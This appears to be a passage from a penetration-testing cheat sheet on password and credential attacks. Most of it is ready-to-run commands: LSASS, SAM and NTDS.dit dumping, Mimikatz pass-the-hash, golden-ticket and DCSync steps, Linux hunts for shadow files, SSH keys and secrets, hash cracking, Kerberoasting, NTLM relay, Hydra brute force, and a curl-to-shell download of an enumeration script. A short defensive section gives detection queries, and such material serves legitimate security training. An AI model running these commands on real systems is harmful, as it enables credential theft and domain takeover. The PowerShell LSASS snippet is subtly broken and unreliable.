rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\temp\lsass.dmp full

# PowerShell method
$p = Get-Process lsass
[Reflection.Assembly]::LoadWithPartialName('System.Management.Automation.WindowsPowerShell')
[System.Management.Automation.Runspaces.Runspace]::DefaultRunspace.CreateNestedPipeline("$env:temp\lsass.dmp", $false).Invoke()

# Using Mimikatz directly
privilege::debug
sekurlsa::logonpasswords

Extract from LSASS Dump

# Using pypykatz (Python)
pypykatz lsa minidump lsass.dmp

# Using Mimikatz (Windows)
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

# Parse specific sections
pypykatz lsa minidump lsass.dmp -k /tmp/kerberos.txt  # Kerberos tickets

SAM Database Extraction

# Export registry hives (requires elevation)
reg.exe save hklm\sam C:\temp\sam.save
reg.exe save hklm\system C:\temp\system.save
reg.exe save hklm\security C:\temp\security.save

# Using Volume Shadow Copy
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\

# Using Mimikatz
privilege::debug
lsadump::sam /system:C:\temp\system.save /sam:C:\temp\sam.save

# Extract hashes with secretsdump (Impacket)
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

# Using samdump2
samdump2 system.save sam.save

# Using pwdump
pwdump system.save sam.save

NTDS.dit Extraction (Domain Controllers)

# Volume Shadow Copy method
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\

# Using ntdsutil
ntdsutil
> activate instance ntds
> ifm
> create full C:\temp\ntds_dump
> quit

# Using diskshadow
diskshadow /s script.txt
# script.txt:
# set context persistent nowriters
# add volume c: alias disk1
# create
# expose %disk1% z:
# exec "cmd.exe" /c copy z:\Windows\NTDS\NTDS.dit c:\temp\NTDS.dit
# delete shadows all
# exit

# Extract with secretsdump (Impacket)
python3 secretsdump.py -ntds ntds.dit -system system -outputfile hashes LOCAL

# Remote extraction (if you have domain admin)
python3 secretsdump.py domain/admin:'Password123'@dc.domain.com -just-dc-ntlm

Mimikatz Attacks

# Enable debug privilege
privilege::debug

# Dump all credentials
sekurlsa::logonpasswords

# Dump SAM database
lsadump::sam

# Dump cached credentials
lsadump::cache

# Dump LSA secrets
lsadump::secrets

# Dump DPAPI secrets
sekurlsa::dpapi

# Export Kerberos tickets
sekurlsa::tickets /export

# Pass-the-Hash
sekurlsa::pth /user:Administrator /domain:target.com /ntlm:<hash>

# Pass-the-Ticket
kerberos::ptt ticket.kirbi

# Golden Ticket (requires krbtgt hash)
kerberos::golden /user:Administrator /domain:target.com /sid:<domain_sid> /krbtgt:<krbtgt_hash> /ticket:golden.kirbi

# DCSync attack (requires replication rights)
lsadump::dcsync /domain:target.com /user:Administrator

Tools Summary

# LaZagne - credential recovery tool
python3 laZagne.py all

# SharpDPAPI - DPAPI credential extraction
SharpDPAPI.exe credentials

# Rubeus - Kerberos attacks
Rubeus.exe dump

# Seatbelt - security enumeration
Seatbelt.exe -group=user

---

Linux Local Password Attacks

Password File Locations

# Primary password files
/etc/passwd      # User accounts (world-readable)
/etc/shadow      # Password hashes (root only)
/etc/group       # Group memberships
/etc/gshadow     # Group passwords

# Backup locations to check
/etc/passwd-
/etc/shadow-
/etc/passwd.bak
/etc/shadow.bak
/var/backups/passwd
/var/backups/shadow

Configuration File Search

# Find all config files
for ext in conf config cnf cfg ini; do
  echo "=== .$ext files ===" 
  find / -name "*.$ext" 2>/dev/null | grep -v "lib\|fonts\|share\|doc"
done

# Search config files for credentials
for file in $(find / -name "*.conf" 2>/dev/null | grep -v "lib\|share"); do
  grep -l -i "password\|passwd\|pwd\|secret\|credential" "$file" 2>/dev/null
done

# Common credential patterns in configs
grep -r "password" /etc/ 2>/dev/null
grep -r "pass=" /etc/ 2>/dev/null
grep -r "credentials" /etc/ 2>/dev/null

# Database configs
cat /etc/mysql/my.cnf
cat /etc/postgresql/*/main/pg_hba.conf
cat /var/www/html/wp-config.php
cat /var/www/html/config.php

History Files

# Bash history
cat ~/.bash_history
cat /home/*/.bash_history

# Other shell histories
cat ~/.zsh_history
cat ~/.sh_history
cat /home/*/.zsh_history

# MySQL history
cat ~/.mysql_history
cat /home/*/.mysql_history

# PostgreSQL history
cat ~/.psql_history

# Less history
cat ~/.lesshst

# Search for passwords in history
grep -h "pass\|pwd\|secret\|key" ~/.bash_history /home/*/.bash_history 2>/dev/null

# Recent commands (last 5 lines each user)
for dir in /home/*; do
  echo "=== $dir ==="
  tail -n5 "$dir/.bash_history" 2>/dev/null
done

SSH Key Discovery

# Find private keys
find / -name "id_rsa" 2>/dev/null
find / -name "id_dsa" 2>/dev/null
find / -name "id_ecdsa" 2>/dev/null
find / -name "id_ed25519" 2>/dev/null
find / -name "*.pem" 2>/dev/null

# Search for key patterns
grep -r "PRIVATE KEY" /home 2>/dev/null
grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"

# Check SSH directories
ls -la /home/*/.ssh/
cat /home/*/.ssh/id_rsa
cat /home/*/.ssh/authorized_keys

# Root SSH keys
ls -la /root/.ssh/
cat /root/.ssh/id_rsa

Database File Search

# SQLite databases
find / -name "*.db" 2>/dev/null | grep -v "lib\|share\|man"
find / -name "*.sqlite" 2>/dev/null
find / -name "*.sqlite3" 2>/dev/null

# MySQL/MariaDB databases
ls -la /var/lib/mysql/

# PostgreSQL databases
ls -la /var/lib/postgresql/

# Common web app databases
find /var/www -name "*.db" 2>/dev/null
find /var/www -name "*.sql" 2>/dev/null

# Extract SQLite data
sqlite3 /path/to/database.db ".dump"
sqlite3 /path/to/database.db "SELECT * FROM users;"

Credential Files in Web Directories

# Common web config locations
cat /var/www/html/wp-config.php
cat /var/www/html/configuration.php
cat /var/www/html/config.php
cat /var/www/html/settings.php
cat /var/www/html/.env
cat /var/www/html/config/database.yml

# Search web directories
find /var/www -name "*.php" -exec grep -l "password\|passwd" {} \;
find /var/www -name ".env" 2>/dev/null
find /var/www -name "config*" 2>/dev/null

# Git repositories (may contain secrets)
find /var/www -name ".git" -type d 2>/dev/null

Memory and Process Analysis

# Search memory of running processes
strings /dev/mem | grep -i password

# Process environment variables
cat /proc/*/environ 2>/dev/null | tr '\0' '\n' | grep -i pass

# Swap analysis
strings /dev/sda2 | grep -i password  # If swap partition is sda2

# Core dumps
find / -name "core" -o -name "core.*" 2>/dev/null
strings core.* | grep -i password

Crack Linux Hashes

# Combine passwd and shadow
unshadow /etc/passwd /etc/shadow > unshadowed.txt

# John the Ripper
john unshadowed.txt --wordlist=/usr/share/wordlists/rockyou.txt

# Hashcat (extract just the hashes)
# $6$ = SHA-512, $5$ = SHA-256, $1$ = MD5
hashcat -m 1800 hashes.txt /usr/share/wordlists/rockyou.txt  # SHA-512 (most common)
hashcat -m 500 hashes.txt /usr/share/wordlists/rockyou.txt   # MD5crypt
hashcat -m 7400 hashes.txt /usr/share/wordlists/rockyou.txt  # SHA-256crypt

# Show cracked passwords
john --show unshadowed.txt
hashcat -m 1800 hashes.txt --show

Automated Enumeration

# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
./LinEnum.sh -t

# Linux Exploit Suggester
./linux-exploit-suggester.sh

# Unix-privesc-check
./unix-privesc-check standard

---

Hash Cracking

Hash Identification

# hashid
hashid '<hash>'
hashid -m '<hash>'  # Show hashcat mode

# hash-identifier
hash-identifier

# haiti
haiti '<hash>'

# Online
# https://hashes.com/en/tools/hash_identifier

Common Hash Types Reference

Hash Type	Example	Hashcat Mode	John Format
MD5	5d41402abc4b2a76b9719d911017c592	0	Raw-MD5
SHA1	aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d	100	Raw-SHA1
SHA256	2cf24dba5fb0a30e26e83b2ac5b9e29e...	1400	Raw-SHA256
SHA512	cf83e1357eefb8bdf1542850d66d8007...	1700	Raw-SHA512
NTLM	b4b9b02e6f09a9bd760f388b67351e2b	1000	NT
LM	aad3b435b51404eeaad3b435b51404ee	3000	LM
MD5crypt	$1$salt$hash	500	md5crypt
SHA512crypt	$6$salt$hash	1800	sha512crypt
bcrypt	$2a$10$...	3200	bcrypt
Kerberos TGS	$krb5tgs$23$...	13100	krb5tgs
Kerberos AS-REP	$krb5asrep$23$...	18200	krb5asrep
NetNTLMv1	user::domain:hash:hash:challenge	5500	netntlm
NetNTLMv2	user::domain:challenge:hash:blob	5600	netntlmv2
WPA-PBKDF2	WPA*...	22000	-
MSSQL 2012+	0x0200...	1731	mssql12
MySQL 5.x	*2470C0C06DEE42FD1618BB99005...	300	mysql-sha1
PostgreSQL	md5...	12	-

Hashcat Usage

# Basic syntax
hashcat -m <mode> -a <attack_mode> <hash_file> <wordlist>

# Attack modes:
# -a 0 = Dictionary
# -a 1 = Combination
# -a 3 = Brute force (mask)
# -a 6 = Hybrid (wordlist + mask)
# -a 7 = Hybrid (mask + wordlist)

# Dictionary attack
hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt

# Dictionary with rules
hashcat -m 1000 ntlm_hashes.txt rockyou.txt -r best64.rule

# Brute force with mask
hashcat -m 1000 ntlm_hashes.txt -a 3 ?a?a?a?a?a?a?a?a
# ?l = lowercase, ?u = uppercase, ?d = digit, ?s = special, ?a = all

# Custom charset
hashcat -m 1000 hashes.txt -a 3 -1 ?l?d ?1?1?1?1?1?1

# Hybrid attack (word + 4 digits)
hashcat -m 1000 hashes.txt -a 6 wordlist.txt ?d?d?d?d

# Combination attack (two wordlists)
hashcat -m 1000 hashes.txt -a 1 wordlist1.txt wordlist2.txt

# Resume session
hashcat --restore

# Show cracked
hashcat -m 1000 hashes.txt --show

# Benchmark
hashcat -b

# GPU selection
hashcat -m 1000 hashes.txt wordlist.txt -D 2  # GPU only
hashcat -m 1000 hashes.txt wordlist.txt -d 1  # Specific device

# Output to file
hashcat -m 1000 hashes.txt wordlist.txt -o cracked.txt

# Potfile management
hashcat -m 1000 hashes.txt --potfile-path custom.pot

John the Ripper Usage

# Basic syntax
john [options] <hash_file>

# Auto-detect format
john hashes.txt

# Specify format
john --format=NT hashes.txt
john --format=Raw-SHA256 hashes.txt

# Wordlist attack
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# With rules
john --wordlist=wordlist.txt --rules hashes.txt

# Incremental (brute force)
john --incremental hashes.txt
john --incremental=Digits hashes.txt  # Numbers only

# Show cracked
john --show hashes.txt

# List formats
john --list=formats

# Continue session
john --restore

# Single crack mode (uses account info)
john --single hashes.txt

# External mode (custom)
john --external=Filter hashes.txt

Hash Extraction Tools

# SSH private key
python3 ssh2john.py id_rsa > ssh.hash
john ssh.hash --wordlist=rockyou.txt

# ZIP files
zip2john protected.zip > zip.hash
john zip.hash --wordlist=rockyou.txt

# RAR files
rar2john protected.rar > rar.hash
john rar.hash --wordlist=rockyou.txt

# 7z files
7z2john.pl protected.7z > 7z.hash
john 7z.hash --wordlist=rockyou.txt

# PDF files
pdf2john.pl document.pdf > pdf.hash
john pdf.hash --wordlist=rockyou.txt

# Office documents
office2john.py document.docx > office.hash
john office.hash --wordlist=rockyou.txt

# KeePass databases
keepass2john database.kdbx > keepass.hash
john keepass.hash --wordlist=rockyou.txt

# Bitcoin wallets
bitcoin2john.py wallet.dat > btc.hash
john btc.hash --wordlist=rockyou.txt

# Truecrypt/Veracrypt
tc2john.py container.tc > tc.hash
hashcat -m 6211 tc.hash wordlist.txt  # Veracrypt SHA-512 + XTS 512

# BitLocker
bitlocker2john -i drive.vhd > bitlocker.hash
hashcat -m 22100 bitlocker.hash wordlist.txt

# LUKS
luks2john.py /dev/sda1 > luks.hash

# WPA/WPA2
aircrack-ng -J capture capture.cap  # Convert to hashcat format
hashcat -m 22000 capture.hc22000 wordlist.txt

# Windows WiFi profiles
netsh wlan export profile key=clear
# Extract from XML, hash is in keyMaterial

Online Cracking Services

# Free services
https://crackstation.net
https://hashes.com/en/decrypt/hash
https://md5decrypt.net
https://hashkiller.io

# Paid/distributed
https://gpuhash.me
https://onlinehashcrack.com

Decrypt with OpenSSL

# Brute force encrypted file (if key is in wordlist)
for pass in $(cat wordlist.txt); do
  openssl enc -d -aes-256-cbc -in encrypted.enc -out decrypted.txt -k "$pass" 2>/dev/null && echo "Found: $pass" && break
done

# For gzip encrypted files
for pass in $(cat wordlist.txt); do
  openssl enc -aes-256-cbc -d -in encrypted.gzip -k "$pass" 2>/dev/null | tar xz && echo "Password: $pass" && break
done

---

Protocol-Specific Attacks

Kerberos Attacks

AS-REP Roasting

# Find users without pre-auth
GetNPUsers.py domain.com/ -usersfile users.txt -no-pass -dc-ip 10.10.10.1

# Crack AS-REP hashes
hashcat -m 18200 asrep_hashes.txt wordlist.txt
john asrep_hashes.txt --wordlist=wordlist.txt

Kerberoasting

# Get TGS tickets
GetUserSPNs.py domain.com/user:password -dc-ip 10.10.10.1 -request

# Crack TGS hashes
hashcat -m 13100 tgs_hashes.txt wordlist.txt
john tgs_hashes.txt --wordlist=wordlist.txt

NTLM Relay

# Capture NetNTLM hashes
responder -I eth0

# Relay attacks
ntlmrelayx.py -tf targets.txt -smb2support

# Crack captured hashes
hashcat -m 5600 captured.txt wordlist.txt  # NetNTLMv2
hashcat -m 5500 captured.txt wordlist.txt  # NetNTLMv1

LLMNR/NBT-NS Poisoning

# Responder
responder -I eth0 -rdw

# Inveigh (PowerShell)
Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y -FileOutput Y

---

Defensive Considerations

Detection Indicators

Attack Type	Indicators	Log Sources
Brute Force	Multiple failed logins from same IP	Auth logs, SIEM
Password Spray	Failed logins across many accounts	AD logs, SIEM
Credential Stuffing	Successful logins from unusual locations	Auth logs
Kerberoasting	Excessive TGS requests	Domain Controller logs
AS-REP Roasting	Pre-auth failure events	Kerberos logs
NTLM Relay	Authentication from unexpected hosts	Network logs
LSASS Access	Process access to lsass.exe	Sysmon Event ID 10
SAM Access	Registry access to SAM hive	Sysmon Event ID 13

Prevention Measures

Control	Effectiveness	Implementation
MFA	High	All user accounts
Account Lockout	Medium	5 attempts / 30 minutes
Password Complexity	Medium	12+ chars, complexity rules
Privileged Access Workstations	High	Domain admin accounts
Credential Guard	High	Windows 10+ endpoints
LSASS Protection	High	Windows Defender Credential Guard
Network Segmentation	High	Separate admin networks
Monitoring	High	Failed login alerting

KQL Detection Queries

// Brute force detection
SigninLogs
| where ResultType == "50126"  // Invalid username or password
| summarize FailedAttempts = count() by IPAddress, bin(TimeGenerated, 5m)
| where FailedAttempts > 10

// Password spray detection
SigninLogs
| where ResultType == "50126"
| summarize 
    UniqueUsers = dcount(UserPrincipalName),
    AttemptCount = count()
    by IPAddress, bin(TimeGenerated, 10m)
| where UniqueUsers > 10 and AttemptCount > UniqueUsers

// LSASS access detection
DeviceProcessEvents
| where FileName == "lsass.exe"
| where ActionType == "ProcessAccessed"
| where InitiatingProcessFileName !in ("svchost.exe", "csrss.exe")

---

Quick Reference

Hydra Cheat Sheet

# SSH
hydra -l user -P pass.txt ssh://IP
# FTP
hydra -l user -P pass.txt ftp://IP
# HTTP POST
hydra -l user -P pass.txt IP http-post-form "/login:user=^USER^&pass=^PASS^:F=fail"
# RDP
hydra -l user -P pass.txt rdp://IP
# SMB
hydra -l user -P pass.txt smb://IP
# MySQL
hydra -l root -P pass.txt mysql://IP

Hashcat Mode Reference

0     = MD5
100   = SHA1
500   = md5crypt
1000  = NTLM
1400  = SHA256
1700  = SHA512
1800  = sha512crypt
3000  = LM
3200  = bcrypt
5500  = NetNTLMv1
5600  = NetNTLMv2
13100 = Kerberos TGS
18200 = Kerberos AS-REP
22000 = WPA-PBKDF2

Common Wordlist Locations

/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/seclists/
/usr/share/wordlists/fasttrack.txt
/usr/share/wordlists/dirb/common.txt
/usr/share/john/password.lst

Credential Extraction Quick Reference

# Windows
crackmapexec smb IP -u user -p pass --sam       # Local hashes
crackmapexec smb IP -u user -p pass --lsa       # LSA secrets
crackmapexec smb IP -u user -p pass --ntds      # Domain hashes
secretsdump.py domain/user:pass@IP              # Remote dump
pypykatz lsa minidump lsass.dmp                 # From dump

# Linux
unshadow /etc/passwd /etc/shadow > hashes.txt
john hashes.txt --wordlist=rockyou.txt

---

Tags

#pentest #passwords #bruteforce #hashcracking #credentials #hydra #hashcat #mimikatz #kerberos #ntlm #redteam